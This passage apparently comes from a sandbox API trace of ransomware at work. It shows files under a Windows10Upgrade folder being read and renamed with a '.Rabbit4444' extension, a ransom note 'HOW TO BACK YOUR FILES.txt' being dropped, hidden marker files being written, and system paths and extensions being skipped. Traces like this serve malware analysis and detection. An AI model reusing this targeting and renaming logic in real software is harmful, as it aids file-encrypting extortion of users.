hTemplateFile=0x0) returned 0x278 [0046.114] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.114] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13742458299) returned 1 [0046.114] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=25800) returned 1 [0046.114] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0046.114] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0046.114] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x67d0, lpName=0x0) returned 0x298 [0046.115] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x67d0) returned 0x70000 [0046.116] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.116] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0046.116] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.116] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0046.116] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.117] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0046.117] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.117] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0046.117] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13742751211) returned 1 [0046.117] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0046.117] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0046.117] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.117] CloseHandle (hObject=0x298) returned 1 [0046.117] CloseHandle (hObject=0x278) returned 1 [0046.119] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\WinREBootApp64.exe.Rabbit4444") returned 49 [0046.119] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\WinREBootApp64.exe" (normalized: "c:\\windows10upgrade\\winrebootapp64.exe"), lpNewFileName="C:\\Windows10Upgrade\\WinREBootApp64.exe.Rabbit4444" (normalized: "c:\\windows10upgrade\\winrebootapp64.exe.rabbit4444"), dwFlags=0x1) returned 1 [0046.119] InterlockedExchangeAdd (in: Addend=0xff618, Value=25808 | out: Addend=0xff618) returned 3196640 [0046.119] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 2555 [0046.119] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6528e0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea6528e0, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x64c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WinREBootApp64.exe", cAlternateFileName="WINREB~2.EXE")) returned 0 [0046.120] FindClose (in: hFindFile=0x102450 | out: hFindFile=0x102450) returned 1 [0046.120] lstrcpyW (in: lpString1=0x130eb60, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.120] CreateFileW (lpFileName="C:\\Windows10Upgrade\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0046.124] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0046.125] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0046.125] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.126] CloseHandle (hObject=0x278) returned 1 [0046.126] CloseHandle (hObject=0x27c) returned 1 [0046.126] GetCurrentThreadId () returned 0xd98 [0046.126] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6530 [0046.126] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Windows10Upgrade\\resources", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources") returned="C:\\Windows10Upgrade\\resources" [0046.126] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x114ce8 | out: hHeap=0xe0000) returned 1 [0046.126] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6528 | out: hHeap=0xe0000) returned 1 [0046.127] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources" | out: lpString1="C:\\Windows10Upgrade\\resources") returned="C:\\Windows10Upgrade\\resources" [0046.127] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\") returned="C:\\Windows10Upgrade\\resources\\" [0046.127] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\.BFC0E91B00AE8A0620D3" [0046.127] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0046.131] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0046.134] FlushFileBuffers (hFile=0x27c) returned 1 [0046.135] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.135] CloseHandle (hObject=0x27c) returned 1 [0046.135] lstrlenW (lpString="C:\\Windows10Upgrade\\resources") returned 29 [0046.136] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.136] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea398e53, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b3c1b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe4d1bdfa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0046.136] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.136] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.136] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0046.136] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.136] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea398e53, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b3c1b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe4d1bdfa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.136] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.136] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.136] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0046.136] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.136] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.136] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe4d1bdfa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe4d1bdfa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe4d1bdfa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.136] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.136] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.136] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea398e53, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3a5195, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea3a5195, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="amd64", cAlternateFileName="")) returned 1 [0046.136] lstrcmpiW (lpString1="amd64", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.136] lstrcmpiW (lpString1="amd64", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.136] lstrcmpiW (lpString1="amd64", lpString2="Rabbit4444.exe") returned -1 [0046.136] lstrcmpiW (lpString1="amd64", lpString2=".") returned 1 [0046.136] lstrcmpiW (lpString1="amd64", lpString2="..") returned 1 [0046.136] lstrcmpiW (lpString1="amd64", lpString2="windows") returned -1 [0046.136] lstrcmpiW (lpString1="amd64", lpString2="bootmgr") returned -1 [0046.136] lstrcmpiW (lpString1="amd64", lpString2="pagefile.sys") returned -1 [0046.136] lstrcmpiW (lpString1="amd64", lpString2="boot") returned -1 [0046.136] lstrcmpiW (lpString1="amd64", lpString2="ids.txt") returned -1 [0046.136] lstrcmpiW (lpString1="amd64", lpString2="NTUSER.DAT") returned -1 [0046.136] lstrcpyW (in: lpString1=0x130eb74, lpString2="amd64" | out: lpString1="amd64") returned="amd64" [0046.136] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6668 [0046.136] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x48) returned 0x10b330 [0046.136] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6670 | out: ListHead=0xf68b0, ListEntry=0xf6670) returned 0xf6570 [0046.137] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3a78b4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3a78b4, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xc981b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hwcompatShared.txt", cAlternateFileName="HWCOMP~1.TXT")) returned 1 [0046.137] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.137] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.137] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="Rabbit4444.exe") returned -1 [0046.137] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2=".") returned 1 [0046.137] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="..") returned 1 [0046.137] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="windows") returned -1 [0046.137] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="bootmgr") returned 1 [0046.137] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="pagefile.sys") returned -1 [0046.137] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="boot") returned 1 [0046.137] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="ids.txt") returned -1 [0046.137] lstrcmpiW (lpString1="hwcompatShared.txt", lpString2="NTUSER.DAT") returned -1 [0046.137] lstrcpyW (in: lpString1=0x130eb74, lpString2="hwcompatShared.txt" | out: lpString1="hwcompatShared.txt") returned="hwcompatShared.txt" [0046.137] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\hwcompatShared.txt", dwFileAttributes=0x0) returned 1 [0046.138] lstrlenW (lpString="hwcompatShared.txt") returned 18 [0046.138] lstrlenW (lpString="Rabbit4444") returned 10 [0046.138] lstrcmpiW (lpString1="Shared.txt", lpString2="Rabbit4444") returned 1 [0046.138] lstrlenW (lpString=".dll") returned 4 [0046.138] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0046.138] lstrlenW (lpString=".lnk") returned 4 [0046.138] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0046.138] lstrlenW (lpString=".ini") returned 4 [0046.138] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0046.138] lstrlenW (lpString=".sys") returned 4 [0046.138] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0046.138] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\hwcompatShared.txt" (normalized: "c:\\windows10upgrade\\resources\\hwcompatshared.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.138] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.138] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13744881033) returned 1 [0046.138] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=825371) returned 1 [0046.138] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0046.138] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0046.138] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc9b20, lpName=0x0) returned 0x298 [0046.139] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc9b20) returned 0x1090000 [0046.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0046.158] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0046.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.158] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0046.158] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.158] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0046.158] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13746926713) returned 1 [0046.159] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0046.159] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0046.159] UnmapViewOfFile (lpBaseAddress=0x1090000) returned 1 [0046.166] CloseHandle (hObject=0x298) returned 1 [0046.166] CloseHandle (hObject=0x278) returned 1 [0046.184] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\hwcompatShared.txt.Rabbit4444") returned 59 [0046.184] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\hwcompatShared.txt" (normalized: "c:\\windows10upgrade\\resources\\hwcompatshared.txt"), lpNewFileName="C:\\Windows10Upgrade\\resources\\hwcompatShared.txt.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\hwcompatshared.txt.rabbit4444"), dwFlags=0x1) returned 1 [0046.185] InterlockedExchangeAdd (in: Addend=0xff618, Value=825376 | out: Addend=0xff618) returned 3222448 [0046.185] InterlockedExchangeAdd (in: Addend=0xff624, Value=20 | out: Addend=0xff624) returned 2557 [0046.185] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3a9fd3, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b1515, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea3b1515, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i386", cAlternateFileName="")) returned 1 [0046.185] lstrcmpiW (lpString1="i386", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.185] lstrcmpiW (lpString1="i386", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.185] lstrcmpiW (lpString1="i386", lpString2="Rabbit4444.exe") returned -1 [0046.185] lstrcmpiW (lpString1="i386", lpString2=".") returned 1 [0046.262] lstrcmpiW (lpString1="i386", lpString2="..") returned 1 [0046.262] lstrcmpiW (lpString1="i386", lpString2="windows") returned -1 [0046.262] lstrcmpiW (lpString1="i386", lpString2="bootmgr") returned 1 [0046.262] lstrcmpiW (lpString1="i386", lpString2="pagefile.sys") returned -1 [0046.262] lstrcmpiW (lpString1="i386", lpString2="boot") returned 1 [0046.262] lstrcmpiW (lpString1="i386", lpString2="ids.txt") returned -1 [0046.262] lstrcmpiW (lpString1="i386", lpString2="NTUSER.DAT") returned -1 [0046.262] lstrcpyW (in: lpString1=0x130eb74, lpString2="i386" | out: lpString1="i386") returned="i386" [0046.262] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\i386" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386") returned="C:\\Windows10Upgrade\\resources\\i386" [0046.262] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\i386", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386\\") returned="C:\\Windows10Upgrade\\resources\\i386\\" [0046.262] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\i386\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3" [0046.262] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\i386\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.266] WriteFile (in: hFile=0x278, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0046.269] FlushFileBuffers (hFile=0x278) returned 1 [0046.269] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.270] CloseHandle (hObject=0x278) returned 1 [0046.270] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63e8 [0046.270] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x46) returned 0x10b6a0 [0046.270] RtlInterlockedPushEntrySList (in: ListHead=0xf6750, ListEntry=0xf63f0 | out: ListHead=0xf6750, ListEntry=0xf63f0) returned 0x0 [0046.271] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3b3c1b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea63c947, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea63c947, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ux", cAlternateFileName="")) returned 1 [0046.271] lstrcmpiW (lpString1="ux", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.271] lstrcmpiW (lpString1="ux", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.271] lstrcmpiW (lpString1="ux", lpString2="Rabbit4444.exe") returned 1 [0046.271] lstrcmpiW (lpString1="ux", lpString2=".") returned 1 [0046.271] lstrcmpiW (lpString1="ux", lpString2="..") returned 1 [0046.271] lstrcmpiW (lpString1="ux", lpString2="windows") returned -1 [0046.271] lstrcmpiW (lpString1="ux", lpString2="bootmgr") returned 1 [0046.271] lstrcmpiW (lpString1="ux", lpString2="pagefile.sys") returned 1 [0046.271] lstrcmpiW (lpString1="ux", lpString2="boot") returned 1 [0046.271] lstrcmpiW (lpString1="ux", lpString2="ids.txt") returned 1 [0046.271] lstrcmpiW (lpString1="ux", lpString2="NTUSER.DAT") returned 1 [0046.271] lstrcpyW (in: lpString1=0x130eb74, lpString2="ux" | out: lpString1="ux") returned="ux" [0046.271] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0046.271] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x42) returned 0x10b3d0 [0046.271] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6670 [0046.271] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3b3c1b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea63c947, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea63c947, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ux", cAlternateFileName="")) returned 0 [0046.271] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0046.271] lstrcpyW (in: lpString1=0x130eb74, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.272] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0046.272] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0046.272] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0046.273] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.273] CloseHandle (hObject=0x278) returned 1 [0046.273] CloseHandle (hObject=0x27c) returned 1 [0046.274] GetCurrentThreadId () returned 0xd98 [0046.274] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0046.274] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Windows10Upgrade\\resources\\ux", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\ux") returned="C:\\Windows10Upgrade\\resources\\ux" [0046.274] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10b3d0 | out: hHeap=0xe0000) returned 1 [0046.274] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0046.274] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\ux" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux") returned="C:\\Windows10Upgrade\\resources\\ux" [0046.274] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\") returned="C:\\Windows10Upgrade\\resources\\ux\\" [0046.275] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\ux\\.BFC0E91B00AE8A0620D3" [0046.275] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\ux\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0046.278] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0046.281] FlushFileBuffers (hFile=0x27c) returned 1 [0046.282] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.282] CloseHandle (hObject=0x27c) returned 1 [0046.283] lstrlenW (lpString="C:\\Windows10Upgrade\\resources\\ux") returned 32 [0046.283] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.283] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\ux\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3b3c1b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea63c947, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe4e7332a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 